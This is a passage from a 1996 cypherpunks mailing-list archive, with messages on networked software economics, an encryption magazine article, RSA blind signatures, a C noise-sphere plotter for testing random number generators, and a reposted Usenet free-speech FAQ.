sophisticated methods of organizing the hierarchies to aid finding
what you want quickly will evolve, just as Yahoo and all the other
search services are now proliferating.

the point is that you no longer "buy" an application-- you pay for
each individual use of pieces that exist all over cyberspace, i.e.
every time you "call" a subroutine, so to speak. the cost-per
use is so low that you don't mind this, and in fact you probably save
a lot of money in the long run, because you only pay for what you use.
furthermore, the software is very specialized and you can get applications
that are very much tailored to what you want them to do-- they require
less and less configuration. entire companies will specialize in delivering
what you want very quickly if what they are selling is not exactly what
you want that moment.

people will in fact create massive applications that are strings of
subroutines of software written elsewhere all over the world. I think
that rapid network speeds will actually allow software to be written
that doesn't reside on a local computer, but in fact in which some
subroutine calls happen over a network!! the parameters and return
data are passed over the network, and the code never runs on a local
computer.

notice the "boundaries" of such an application seems to shift 
dramatically. you cannot "circumscribe" such an application as easily,
it is not one "thing" that runs isolated on your own computer. it
is a sort of holographic element in a massive algorithmic universe
that calls on all kinds of other elements in the universe.

it may be possible to build in the same kinds of "resistance to
errors" in this kind of computation that we now have in TCP/IP
protocols. i.e. if a certain module fails, the system may automatically
call up other modules that work.

all of this requires a reliability and complexity we do not have
at the moment, but I see major hints of it in our 
current system, and I believe we are
rapidly evolving towards the above scenarios.

the above cannot really be realized so long as people insist on
selling their code as if it is a massive product that has to be purchased
and shipped somewhere in shrinkwrapped packaging. as we begin to move
away from the concept of, "you are buying the right to use this program
whenever you want for a lot of money" to "you are buying this particular
computation or use of the algorithm for a small fraction of the development 
cost", the above system will begin to proliferate and blossom.

==

what does this all mean to existing (software) 
companies? increasingly, the value
of a company of people, or some kind of structure, will be how well
it can coordinate people and resources to accomplish some particular
goal. but the company will increasingly have to compete with other
structures that may be more able to coordinate resources efficiently.
if an incredible groupware program evolved, for example, that let 
people coordinate themselves and others as "efficiently" or more
so than a company does today, companies in the modern sense would
tend to die out. a "company" becomes a virtual collection of people
and resources to accomplish a common goal, but the geographic
localization/focus characteristic of modern companies will be seen
as something as an anachronism.

a company that is drowning in inefficient bureacracy will tend to
find that people will simply go elsewhere and find more efficient
methods of "plugging in" their value, because they are better paid
by some structure that does not waste their energies.

I am not saying above that bureacracy is evil-- we are going to find
out what kinds of bureacracy (or "coordination") 
is really necessary in the future, and
what kind is superfluous, burdensome, and inefficient, as people increasingly 
move out of/away from structures running amuck in the latter.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 30 Mar 1996 23:10:14 +0800
To: Senator Exon <cypherpunks@toad.com>
Subject: Very nice Denise Caruso article in MacWorld
Message-ID: <Pine.SUN.3.92.960329232001.16615A-100000@elaine17.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Not that anyone actually reads Mac magazines anymore, but back page of the
May 1996 issue of MacWorld (they don't procrastinate) bears an article
titled "Civil Rights Activists 'Say, Sniff This!': encryption is one
solution to net censorship," wherein Jim Warren, PGP, and other cool
things are presented in an unambiguously good light.

"On February 8th, President Clinton lifted his pen to sign the scabrous
Telecommunications Reform Act of 1996.... The law is just one example of
how our personal freedoms are fast eroding as digital technologies make it
feasible to monitor electronic communications.... The decision to encrypt
personal communication within this country is a political act that we
still have the luxury to practice today. It is already illegal in many
countries to use encryption for any reason without a license from the
government."

It should appear on www.macworld.com in about a month.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 29 Mar 1996 23:32:12 +0800
Subject: No Subject
Message-ID: <199603291532.XAA12310@infinity.nus.sg>
MIME-Version: 1.0
Content-Type: text/plain


Hi!
I have some stupid question about how to implement blind signature.
I Know it works as follows:
If A wants B to sign X but donot know it is X, A can send
   X*PK(random)  : PK is public key of B
Then B signs on message:
  SK(X*PK(random)) ==> SK(X)*random
Then A can obtain SK(X) by SK(X)*random/random

My question is when I see how RSA encrypts using PKCS
The PKCS block is like this
 00 01 FF FF FF FF ... 00 input
Then SK(00 01 FF FF FF .. 00 input) .
If the input = X*PK(random)
then SK(00 01 FF FF FF .. 00 X*PK(random)) will not produce SK(X)*random
How to solve this??
Thanks!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 29 Mar 1996 23:35:32 +0800
Subject: No Subject
Message-ID: <199603291535.XAA12314@infinity.nus.sg>
MIME-Version: 1.0
Content-Type: text/plain


Mutatis Mutantdis writes:

> >I've got a short program for the PC (w/TPascal source) that plots a 
> >noise sphere from a file of (pseudo) random data, if anyone is 
> >interested.  Requires a VGA card that handles mode 5Fh (640 x 480, 
> [..]
> >The source has a brief explanation of what noise spheres are and a 
> >reference to the Pickover article the program was based on.

> Somebody sent me a C++ conversion of it. It compiles fine with BCC 4.02.
> 
> Enclosed here (thanks to  "James Pate Williams, Jr." <pate@mindspring.com>)

Here's a version of it for X Windows, translated into plain-old C. 


-- Jeff
                                 oo
-----------------------------cut /\ here------------------------------
/*
  xnoisesph.c

  Compiled on Linux with:
  	cc -o xnoisesph xnoisesph.c -L /usr/X11R6/lib -lX11 -lm

  Usage: xnoisesph file
  Or:    xnoisesph <file

  Based on:

  NOISESPH.PAS, A Noise Sphere plotter written in Turbo Pascal (23-Mar-96)
  Robert Rothenburg Walking-Owl <WlkngOwl@unix.asb.com>
  No copyright is claimed.  No guarantees made.

  Usage: noisesph file

  This program reads a file of random or pseudo-random data and plots
  a noise sphere of the data. Poor RNGs or sampling methods will show
  clear patterns (definite splotches or spirals).

  The theory behind this is to get a set of 3D polar coordinates from
  the RNG and plot them.  An array is kept of the values, which is
  rotated each time a new byte is read (see the code in the main
  procedure).

  Rather than plot one sphere which can be rotated around any axis,
  it was easier to plot the sphere from three different angles.

  This program is based on a description from the article below.  It
  was proposed as a means of testing pseudo-RNGs:

  Pickover, Clifford A. 1995. "Random number generators: pretty good
	 ones are easy to find."  The Visual Computer (1005) 11:369-377.
*/

#include <X11/Xlib.h>
#include <stdio.h>
#include <math.h>
#include <errno.h>
#include <unistd.h>

typedef struct _Cartesian {
  double x, y, z;
  unsigned Color;
} Cartesian;

typedef struct _Polar {
  double r, theta, phi;
} Polar;

double ByteToReal(unsigned char);
unsigned int ScaleColor(double);
int Round(double);
void Plot(Cartesian *);
void PolarToCartesian(Polar *, Cartesian *);

int MidA, MidB, MidC, MidY, Scale;

char *pgm;
Window w;
Display *d;
GC gc;

void
main(int ac, char **av)
{
    int i;
    char *fname;
    FILE *inp;
    XEvent event;
    XExposeEvent *ee = (XExposeEvent *)&event;
    int width, height, bwidth, depth, wx, wy;
    Window root;

    pgm = basename(*av);
    if (ac > 2) {
	fprintf(stderr, "Usage: %s [file]\n", pgm);
	exit(1);
    }

    if (ac == 2) {
	fname = av[1];
	if ((inp = fopen(fname, "rb")) == NULL) {
	    fprintf(stderr, "%s: Can't open %s - %s\n", pgm, av[1],
	    	strerror(errno));
	    exit(1);
	}
    }
    else {
    	inp = stdin;
    	fname = "(stdin)";
    }

    if (!(d = XOpenDisplay(NULL)))
    {
	fprintf(stderr, "%s: Can't open display\n", pgm);
	exit(1);
    }

    w = XCreateSimpleWindow(d, RootWindow(d, DefaultScreen(d)),
	0, 0, 640, 480, 0, BlackPixel(d, DefaultScreen(d)),
	BlackPixel(d, DefaultScreen(d)));

    XSelectInput(d, w, ExposureMask);

    gc = XCreateGC(d, w, 0L, NULL);
    XSetBackground(d, gc, BlackPixel(d, DefaultScreen(d)));
    XSetForeground(d, gc, WhitePixel(d, DefaultScreen(d)));

    XMapRaised(d, w);

    while (XNextEvent(d, &event), event.type != Expose)
    	;

    /*
     * Get the window's actual width and height.
     */
    XGetGeometry(d, w, &root, &wx, &wy, &width, &height, &bwidth, &depth);

    /*
     * Initialization done, window on screen; time for real work.
     */

    {
	double X[3];
	int i, n = 0;
	int byte;
	Cartesian C;
	Polar P;

	Scale = width / 6;
	MidA = Scale;
	MidB = 3 * Scale;
	MidC = 5 * Scale;
	MidY = height / 2;
	if (MidY < Scale)
	    Scale = MidY;

	for (i = 0; i < 3; i++) {
	    if ((byte = getc(inp)) == EOF) {
		fprintf(stderr, "%s: Early EOF on %s\n", pgm, fname);
		exit(1);
	    }
	    X[i] = ByteToReal((unsigned char) byte);
	}

	while (1) {
	    P.r = sqrt(X[(n + 2) % 3]);
	    P.theta = M_PI * X[(n + 1) % 3];
	    P.phi = 2 * M_PI * X[n];
	    PolarToCartesian(&P, &C);
	    Plot(&C);
	    if ((byte = getc(inp)) == EOF)
	    	break;
	    X[n] = ByteToReal((unsigned char) byte);
	    n = (n + 1) % 3;
	}
    }

    /*
     * Now hang out.  Let the window manager kill us.
     */
    while (1)
	XNextEvent(d, &event);

    exit(0);
}

double ByteToReal(unsigned char b)
{
  /*note that there will be some gaps since we're only using the
	 equivalent of an 8-bit decimal here*/
  return  b / 256.0;
}

unsigned int ScaleColor(double x)
{
  return 0;
}

int Round(double x)
{
  return (int) (x + 0.5);
}

void Plot(Cartesian *C)
{
    XDrawPoint(d, w, gc, MidA + Round(Scale * C->y),
    			MidY - Round(Scale * C->z));
    XDrawPoint(d, w, gc, MidB + Round(Scale * C->x),
    			MidY - Round(Scale * C->y));
    XDrawPoint(d, w, gc, MidC + Round(Scale * C->z),
    			MidY - Round(Scale * C->x));
}

void PolarToCartesian(Polar *P, Cartesian *C)
{
  /* No rotation was added. Instead we plot from three angles... */
  C->x = P->r * sin(P->phi) * cos(P->theta);
  C->y = P->r * sin(P->phi) * sin(P->theta);
  C->z = P->r * cos(P->phi);
  /* We can assign colors based on x, y, z, r, theta / pi or phi / (2 * pi) */
  C->Color = ScaleColor(C->y);
}





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 30 Mar 1996 20:04:20 +0800
To: Ted Garrett <teddygee@visi.net>
Subject: Re: Anonymous Cpunk Bashing
Message-ID: <m0u2vEJ-0008xSC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:29 AM 3/30/96 -0500, Ted Garrett wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>At 01:06 PM 3/29/96 -0800, you wrote:
>>The implication is that the people who oppose this "list of shame" are doing 
>>so primarily for PERSONALITY reasons, rather than on the issues.  I would 
>>feel better about the whole thing if the people who volunteered for the list 
>>had engaged in some sort of serious effort to show that the placement of the 
>>other people on that list was unjustified.  Lacking even the most 
>>rudimentary effort along these lines, I really wonder who (and what) these 
>>people think they're supporting.
>
>I think that sometimes, one's cumulative reputation must count for something.
>Most of the people who are included in this 'list of shame' have contributed
>enormously to the furtherance of the crypto field in general.  Whether I conscribe
>to their viewpoints or not on a given subject, it is rather easy for me to think
>of something they have written which I use as a rather concrete reference.  Thusly,
>given a track record of open and noteworthy thought on the field, I find it difficult
>to denounce, as an example, Bruce Schneier.  Especially IF it's only a matter of
>sharing a difference of opinion on a given bill or set of bills before our lawmakers.
>
>Considering the fact that I've not seen Mr. Schneier come out on either side of the
>Leahy Bill or,

He's one of the people I haven't seen respond to the Leahy bill, as well.  
However, I don't regularly read SCI.CRYPT or much else  that he may put his 
comments on, and I don't recall if he commented here.  That's one of the 
reasons to be suspicious of the motivations behind the "list of shame," 
however there's good reason to be even  more suspicious of those who have 
rushed to debunk it by "standing behind" all those listed, with no 
distinction.    I think it is obvious that at least a few people listed 
should have been listed, but the majority I simply don't know about.  I 
wouldn't be surprised if at least one of those anonymous messages 
deliberately loaded up the list  with unworthy targets simply to disguise 
the ones who ought to be listed.


> for that matter, many of the other bills currently before the congress,
>it's hard for me to support mail-bombing him or many of the others on the list




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 30 Mar 1996 19:16:53 +0800
To: cypherpunks@toad.com
Subject: Reposted from Usenet: Freedom Knights
Message-ID: <6Z8kLD20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


These two Usenet articles have little crypto relevance (one sentense that
I put in). Still, those who believe in free speech should be interested.

From: dave@jetcafe.org (Dave Hayes)
Newsgroups: news.admin.censorship,news.admin.misc,news.admin.policy,news.admin.net-abuse.announce,alt.culture.usenet
Subject: An Alternative Primer on Net Abuse, Free Speech, and Usenet
Followup-To: news.admin.censorship
Date: 28 Mar 1996 03:54:04 -0800
Organization: JetCafe - A Non-Profit Internet Service Provider
Lines: 454
Sender: dave@kachina.jetcafe.org
Approved: dave@jetcafe.org
Distribution: world
Expires: 27 Apr 96 04:53:59
Message-ID: <freedom-faq-1-828014039@jetcafe.org>
Reply-To: freedom-knights@jetcafe.org (Freedom Knights of Usenet)
NNTP-Posting-Host: kachina.jetcafe.org
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Summary: This posting clarifies and defines True Free Speech
Keywords: FREEDOM, CENSORSHIP, NET-ABUSE, NET-COPS
X-URL: http://www.jetcafe.org/~dave/usenet

Posted-By: auto-faq 3.2.1.4
Archive-name: freedom-faq
Revision: 1.6
Posting-Frequency: Posted once each month

      An alternative Primer on Net Abuse, Free Speech, and Usenet
                              Dave Hayes
                           dave@jetcafe.org

------------------------------

Subject: 0. Table of Contents

	1. Introduction
		1.1) What this document is
		1.2) Prerequisites
	2. Background
	3. Basic Definitions
	4. Basic Philosophies
		4.1) Declaration of Free Speech
		4.2) What is 'True Free Speech'?
		4.3) What is 'net abuse'?
	5. Frequently Debated Strawmen (aka Windmills)

------------------------------

Subject: 1. Introduction

1.1) What this document is

This document represents an ongoing attempt to educate people about
true freedom of speech among the emerging cyber-communities. There is
a companion document to this, the USENET Site of Virtue FAQ, which
should be read AFTER this document.

1.2) Prerequisites

If you don't know what Usenet is, you're reading the wrong document!

Go look in the newsgroup news.answers for appropriate introductory
documents. There are many, and each has their own point of view.  In
order to understand the discussions here you should be familiar with
USENET in general, and have a reasonable amount of experience posting
and/or reading news.

If these documents are not in news.answers or news.announce.newusers
on your site, they can be had by anonymous ftp from rtfm.mit.edu in
the directory /pub/usenet-by-hierarchy/news/announce/newusers.

If you have a WWW browser, the following URLS should help you out:

<http://www.jetcafe.org/~dave/usenet/>

It helps to be familiar with news administration, how news works
in general, and have kept up in some discussions on news.admin.*,
but this is not totally mandatory for understanding this document.

Finally, you should believe that no expression, however annoying,
profit-oriented or counterproductive, should be prevented from being
distributed. If you do not believe in this way, this document will
only make you angry.  (If that's what you want, then read it.)

------------------------------

Subject: 2. Background

For a long time, I've been a loud advocate of free speech in most of
the USENET related administration groups. I've participated in a few
net.political actions to ensure the freedom of speech that we'd like
to enjoy. For my efforts, I've been publically branded a loon, insane,
idealistic, moronic, obnoxious, wacko, a kook, and other expletives
which I'd rather not go into.

Many times, I've repeated the same arguments over and over, all of
which relate to this ultimate goal of absolute free speech. Well,
after several years even a loon such as myself gets tired of repeating
the same stuff over and over. It had been suggested that I write a FAQ
of sorts on my ideas, and I felt the time was right, so here it is.

Herein lies the heart of my arguments, and questions with answers
about them. The companion document, the USENET Site of Virtue FAQ
describes a new credo that willing USENET participants can actually
adopt and use if they so desire.

I implore you not to adopt -any- credo (even this one) or philosophy
just because someone you see does so as well, for these credos only
work for individuals who have personally and honestly decided that
these are good ideas. Use your own judgement and take your power back
from those who wish to steal it from you.

------------------------------

Subject: 3. Basic Definitions

Here are some definitions which you'll find apply to things in this document,
and most of my arguments.

Beliefs - Networks of assumptions about the way things are.

Ethics - Rules of conduct which appease and satisfy one's own true self.
         Directly opposed to Morals (see below)

Lawful Speech - That speech which does not conflict with Morals

Morals - Rules of conduct which appease and satisfy a governing, social,
         or communal entity.


------------------------------

Subject: 4. Basic Philosophies

4.1) Declaration of Free Speech

We hold these Truths to be self-evident, that all Humans are created
equal, that they are endowed by their creator with certain unalienable
Rights, that among these are Unhindered Communications, Unregulated
Exchange of Ideas, and Freedom of Speech, that to secure these rights
the Usenet is instituted on networks of the world, that when any
administration of Usenet becomes destructive to these ends, it is the
Right of the People to alter or to abolish it and to institue new
administration, laying its foundation on such Principles, and
organizing its Powers in such Form, as to them shall seem most likely
to effect their Free Communication.

[With much thanks to the Declaration of Independence]

4.2) What is True Free Speech?

True Free Speech is that speech which is hindered by nothing other
than the speaking individual's own ethics (see definition above).

Where True Free Speech exists, no external party may restrict someone
else's speech, for any reason, period.

Speech, in the above definition, does *not* restrict another's speech.
It can't. It takes a person to *act* on that speech to restrict
another's speech. That person, then, would be the responsible party.
A news admin setting up a news server to act is one way to create the
illusion of speech-restrictive speech.

The litmus test for True Free Speech is speech that makes you -want-
to silence another person. If that speech is not silencable by you
(whether you want to or not), you have a state of True Free Speech.

4.3) What is net abuse?

Any action that stops a properly configured transport system from
performing its normal store and forward services.

The key words are "properly configured". For that definition, you'll
have to see the "Site of Virtue" FAQ.

4.4) What is Censorship?

Censorship is the restriction of communicated ideas based on their
expression style or their content. On Usenet, this is defined as
reading or parsing anything but certain specific headers of a news
article to determine whether or not to delete it from the news spool
of a news server.

By this criterion, the following RFC 1036 headers can NOT be
interpreted in any way, in order to avoid censorship:

Sender:
From:
Subject:
NNTP-Posting-Host:
Approved:

Also, any invokation of the "Usenet Death Penalty" by aliasing a site
out of one's feed is considered blatant censorship. Unless a clear
newsfeed redundancy problem can be identified, such aliasing is
considered censorship.

------------------------------

Subject: 5. Frequently Debated Strawmen (aka Windmills)

This section contains the many frequently debated arguments (with
"Dave Hayes" like answers) over free speech issues. If you find
yourself embroiled in a debate with a control freak, the information
below should help you out. If you find yourself embroiled in a debate
with me, you might want to save time and read below.

- Free speech is all well and good, but what is to prevent
  unreasonable users from committing "net-abuse"?

The strawman here is that someone else is defining "net-abuse"
quite differently than I do above.

Any label of "net-abuse" is based on an arbitrary standard of conduct
held by a person or group of people (even mine). There is nothing that
says that this standard of conduct is the one true and right standard
of conduct.  People's standards vary.

You, as a free person, have an unalienable right to a choice as to
whether or not to adopt any standard of conduct. This is based on your
ethics, not their morals. Thus, if someone labels you "unreasonable",
that's not your problem...it's theirs.

I'm not saying you should now go out and kill someone. I'm merely
stressing the importance of ethics, internal codes of conduct which
you will not violate (because -you- wrote them), in determining
whether or not you did something wrong.

- But there IS a general consensus on what net abuse is! Most news
  admins have adopted it.

Don't let anyone fool you into believing that there some written
consensus on or standard of net.abuse. There isn't, and if it claims
to be, you can determine the invalidity of such a claim by observing
just how many people argue about it. Without a consensus, it's quite
arbitrary as to what people will claim abuse is.

If someone has written up something, think about whether you agreed to
abide by it or not before the fact when you are called to task on some
violation. It is the root of dishonor to hold someone responsible to a
code of conduct they didn't know about. Not only does this not work,
but it's damn unfair.

You may get localized consensi who decide to act not unlike the street
gangs in LA or the legal gangs in American Federal Government, armed
with scripts and authority, they attempt to bully people into
submission into their way. This does not mean that there is a
consensus. You can't expect 50,000 or more who come to a consensus on
an issue this complex.

Typically, the label of abuse is used as a wedge to stop someone
from posting something that isn't liked, but this isn't always the
case. Sometimes, people are genuinely trying to help things out.
Such people should be reminded of the arbitrary nature of their
standards, and of the wide variety of people on the net.

- We can't allow free speech. What if something extremely damaging is
  posted?

This strawman can easily be debunked by recognizing who is defining
'damage'. See above, as this is the same as saying something is
"net-abuse".

The true test of freedom of expression is when the advocates of True
Free Speech are confronted with expression that they find they would
like to silence.

If this test is passed, the expression remains a thorn in their side.
The thorn serves a great purpose as a reminder of the true freedom
they have.

If this test is failed, the entire philosophy of True Free Speech
soon crumbles, and true freedom of expression becomes a bad thing
in the eyes of the people who tried. "After all, people will abuse
anything if given the chance", they'll say.

We already have true freedom. We just keep agreeing to give it up.

- But there really are damaging things that can be posted!

You didn't listen above. Let me try another way. Here are some
commonly dredged up examples of "damaging" information:

* recipes for strong encryption
* pornography and obscenity
* recipes for making chemical, biological, and atomic weapons
* recipes for making counterfeit money

Dr. Dimitri Vulis said it really succinctly:

"Posting such information to Usenet doesn't force anyone to use it to
take some illegal action. And even if publishing such information by
itself violates your local laws, it's up to your local law enforcement
agents to silence you, not the Usenet Cabal."

- There is no cabal. Anyone saying this is obviously a kook.

Ah, and if there was a "secret society", what better way to hide
it than by denying it and causing those who do not to look foolish?

A "Cabal" of usenet has been identified. This Cabal is defined as:

"Those net citizens, including some usenet administrators, who by their
own consensus reality, set themselves apart from and superior to
usenet users and use this illusory superiority to restrict or censor
any usenet user's attempts at communication through usenet."

The Cabal generally works in concert with each other over their own
private channels of communication. You can tell a Cabal member by the
arrogant holier-than-thou way that they refuse or block your attempts
at communication, regardless of external perceptions of reasonability
about those attempts.

Just to be clear, I have no reason to believe that these people are
acting out of deliberate malice. It's simply a trait of human beings
to abuse positions of power and respect to their own ends. In this
case this trait is damaging the freedom of usenet.

- If a lot of people complain about someone, there must be something
  that person is doing wrong.

Just because a mob comes to your door and demands to lynch someone,
doesn't mean that the someone in question did anything worthy of
being lynched. Usenet has become mob-oriented with several issues,
most notably the famous C&S spamming, demonstrating the new jargon
term "cybermob".

Mobs are generally ignorant, dense, and single-minded. They have
a tendancy to be generated by emotional issues, with subsequent
loss of sanity for most involved. Do you really want to trust the
judgement of someone else to this phenomena?

Yes, once you become a sysadmin, the rest of the Usenet community will
expect that you are prepared to discipline your users when they engage
in whatever they decide to call net-abuse.  Hopefully, by then, you
will have grown past that.

And what does this discipline really accomplish? Usually, nothing.

- Someone is defaming me. They should be silenced.

Forget USENET, what if these people were to say the same things
in person, or to other people while you are not present?

Again, Free Speech requires that people have the *ability* to defame
you. Remember that you also have the ability to defend yourself. If
such defamation gets too intense, see your lawyer, and attempt to get
the defamer to agree to stop.

- Free speech means the ability to say what you want.  It does
  not guarantee you _where_ you want to say it and _how_ you
  want to say it.

This is a definitions strawman. If you can't say something
where and how you want to say it, is your speech truly free?

Would you like some arbitrary person telling you where and
how you can say certain things? I can see it now:

"Sure you have free speech, at 3AM on channel 145 for 2.5 minutes."

Anyone using this argument has no understanding or desire for
free speech, by the very fact that they use this argument.

Free speech, as defined in this document, guarantees that you can say
anything, anywhere, and anyway you want to.

- USENET operates on certain principles. Create your own net if you
  don't like the way it runs.

This is a political hostage strawman. The arguer is attempting to
convince you that everyone else likes things the way they are, and
that everyone else is in control of USENET.

If you are running a site, this is patently false. USENET is a collective
anarchy, where site admins have authority over their part of the collective.
You have absolute control over your site to run it any way you want to.

If you aren't running a site, don't waste your breath arguing with
these people. Find a Site of Virtue to post from, and support Sites
of Virtue. That way, we -will- create our own net.

- If you argue for free speech, people aren't going to take you seriously.

This is an emotional hostage strawman. The arguer is attempting to play
on your need to be taken seriously to coerce you into doing things their
way...or they won't take you seriously.

There are others who won't take you seriously if you cave into these
coercions. Still, others won't take you seriously at all. If we become
affected by everyone's impressions of us, we will certainly be candidates
for an insane asylum.

I would think that you don't really need to be taken seriously by
anybody who would attempt to coerce you in this way.

-But this is Usenet, a place where speaking is a privilege, not a right.

That all depends on your site admin. If you are at a Site of Virtue,
speaking is a right.

-Freedom of speech does not mean yelling FIRE! in a crowded theater.

Patently false. Yes, it does mean that.

Practically, if you hear someone yell "FIRE!" then you have some
decisions to make. Are you going to believe that person or not,
especially when you see nothing? If you do believe this person, are
you going to run for the door like a crazed animal, or quickly make
your way to the exit in a civilized manner?

Whichever you choose, it's -your- choice and -your- responsibility.
It is -not- the responsibility of the person who yelled "FIRE!"
that -you- chose one direction or another. Any other decision
strips your power away from you.

- It's wrong to force me to read your trash.

Given that people have to manually select articles from a menu, it's
hard to imagine someone forcing their fingers to press certain keys in
a certain order, so that people are forced to read anything.

Indeed, the entire concept of force becomes ludicrous when one recognizes
that one can simply close one's eyes and not read anything presented to
them.

This does bring up a point, however. There -is- a place for
censorship. Your personal newsreaders.

- But who gave you free speech rights on my computer?

YOU did when you loaded the news transport software. According to RFC1036,
making a news server and getting a feed allows the transport of messages
between your news server and another. If you do not specifically filter
messages, those messages are allowed by implication.

- You can't think like that. Your reputation will suffer.

The value of a set of words is contained within the set of words, NOT
in who said them. It is a common mistake of most human beings to judge
the validity of a set of words mostly upon the reputation of the
messenger.


------------------------------

Subject: Revision History

$Log: freedom-faq.1,v $
Revision 1.6  1996/03/13 22:56:11  dave
Added Dr. Vulis suggested changes: Approved line = censorship,
examples of speech commonly considered damage, other misc.

Revision 1.5  1996/03/04 00:03:59  dave
Added definition of Cabal

Revision 1.4  1996/02/28 21:53:33  dave
Changed libel back to defamation.

Revision 1.3  1996/02/28 00:32:34  dave
Changed "slander" to "libel", as the latter is more appropriate
for USENET.

Revision 1.2  1996/02/19 08:16:15  dave
Tightened up the definition of TFS, added a definition for Censorship,
added a few words here and there for da flow.

Revision 1.1.1.2  1996/02/19 07:52:11  dave
Initial Import


--
         >>> Dave Hayes - Altadena CA, USA - dave@jetcafe.org <<<

 You need not wonder whether you should have a reliable person as a friend.
               An unreliable person is nobody's friend.

From: dave@jetcafe.org (Dave Hayes)
Newsgroups: news.admin.censorship,news.admin.misc,news.admin.policy,news.admin.net-abuse.announce,alt.culture.usenet
Subject: The USENET Site of Virtue FAQ
Followup-To: news.admin.misc
Date: 28 Mar 1996 03:54:57 -0800
Organization: JetCafe - A Non-Profit Internet Service Provider
Lines: 420
Sender: dave@kachina.jetcafe.org
Approved: dave@jetcafe.org
Distribution: world
Expires: 27 Apr 96 04:54:52
Message-ID: <virtue-faq-1-828014092@jetcafe.org>
Reply-To: freedom-knights@jetcafe.org (Freedom Knights of Usenet)
NNTP-Posting-Host: kachina.jetcafe.org
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Summary: This posting describes how to run a USENET Site of Virtue,
Keywords: FREEDOM, KNIGHT, HONOR, VIRTUE, CENSORSHIP
X-URL: http://www.jetcafe.org/~dave/usenet

Posted-By: auto-faq 3.2.1.4
Archive-name: virtue-faq
Revision: 1.5
Posting-Frequency: Posted once each month

                     The USENET Site of Virtue FAQ
                              Dave Hayes
                           dave@jetcafe.org

------------------------------

Subject: 0. Table of Contents


	1. Introduction
		1.1) What this document is
		1.2) Prerequisites
		1.3) Internet Resources
	2. Basic Definitions
		2.1) What is a 'Freedom Knight'?
			2.1.1) How does one become a Freedom Knight?
		2.2) What is a USENET 'site of virtue'?
		2.3) What is a USENET 'newsreader of virtue'?
		2.4) What does "content-based" mean?
	3. The Freedom Knight Code of Honor
	4. Technical Issues for a Site Of Virtue
	5. Policy Issues for a Site Of Virtue
	6. Technical Issues for a Newsreader Of Virtue
	7. Other Frequently Asked Questions

-----------------------------

Subject: 1. Introduction

1.1) What this document is

This is the USENET Site of Virtue FAQ. It represents an ongoing
attempt to implement true freedom of speech among the emerging
cyber-communities, including standards of conduct and technical
implementation issues relavent to operating a site which supports
true freedom of speech.

A companion document is "A Primer on Net Abuse, Free Speech, and
Usenet". It is suggested that you read that first, as it describes
the philosophies behind a Site of Virtue.

1.2) Prerequisites

If you don't know what Usenet is, you're reading the wrong document!

Go look in the newsgroup news.answers for the documents "What is
Usenet" and "How to become a USENET site".  In order to understand
the discussions here you should be familiar with USENET in general,
and have a reasonable amount of experience posting and/or reading
news.

If these documents are not in news.answers or news.announce.newusers
on your site, they can be had by anonymous ftp from rtfm.mit.edu in
the directory /pub/usenet-by-hierarchy/news/announce/newusers.

You should be familiar with news administration, how news works
in general, and have kept up in some discussions on news.admin.*.

Finally, you should believe that no expression, however annoying or
counterproductive, should be prevented from being distributed. If you
do not believe in this way, this document will only make you angry.
(If that's what you want, then read it.)

1.3) Internet Resources

There is a mailing list which most of the freedom knights subscribe
to. The list address is "freedom-knights@jetcafe.org", and
subscriptions should go to "majordomo@jetcafe.org".

For those who do not know majordomo, put the word "help" in the
BODY (not the HEADER) of a mail message and fire it off to
"majordomo@jetcafe.org".

If that didn't clarify what you are supposed to do, and you want
to subscribe, put the words "subscribe freedom-knights" in the body
of a mail message to "majordomo@jetcafe.org".

There is also a WWW site, this is http://www.jetcafe.org/~dave/usenet
and this is the Freedom Knights site on the net.


-----------------------------


Subject: 2. Basic Definitions

2.1) What is a 'Freedom Knight'?

A Freedom Knight is a person who:

  -Conducts themselves in a manner consistent with the
   Freedom Knight Code of Honor
	
  -Works in an honorable fashion to ensure the persistance,
   defense, and existance of Sites of Virtue

These standards are completely voluntary standards, in other words
there will be people who claim to but do not adhere to all of these
standards. Such non-adherence is not a bad or good thing, nor is there
any punishment or reward associated with adherence or non-adherence.
Rather, these standards are put here merely to point the way to how a
Freedom Knight "should" act, to be worthy of the name.

It is said that you will know a person by their actions. More
directly, if someone finds someone who claims to be a Freedom Knight,
and they do not observe these standards, chances are that they aren't
*really* a Freedom Knight.

Keep in mind, this is no reason to judge a Freedom Knight's actions.
A Freedom Knight is responsible to no one other than themselves.
Russ Allbery <rra@cs.stanford.edu> sums up the credo of the Freedom
Knight with regards to this issue. He was asked "Why won't you be
decent?". Here is his response:

>Because I have no desire to become so, for becoming "decent" requires
>that I accept a standard of society, that I order my beliefs and
>reactions in order to fit someone's standard of acceptable and
>unacceptable.  That I cannot do, for my individuality is the gift of
>my Creator and is not something that I will give up lightly, easily,
>or for the sake of social acceptance.  *I* *am* *myself*, and I will
>not change for you, ... or for the people who claim they are
>disappointed in me because I do not meet their internal models of what
>I should be like.

2.1.1) How does one become a Freedom Knight?

Contrary to what many would like to hear, there is no established body
of judges who proclaim a USENET citizen a Freedom Knight. This is a
completely voluntary and self-policing position, requiring no one but
oneself to proclaim knighthood.

Becoming a Freedom Knight is as simple as adopting the Freedom Knight
Code of Honor, then sending a simple message to the Freedom Knights
mailing list (see section 1.3) proclaiming yourself as a Freedom
Knight. Subscribing to the list is recommended, but not required.

Remember, it is your actions which show you to be a Freedom Knight,
not your proclamations.

2.2) What is a USENET 'Site of Virtue'?

This is a site run by a Freedom Knight which meets specific technical
requirements, as specified below.

2.3) What is a USENET 'Newsreader of Virtue'?

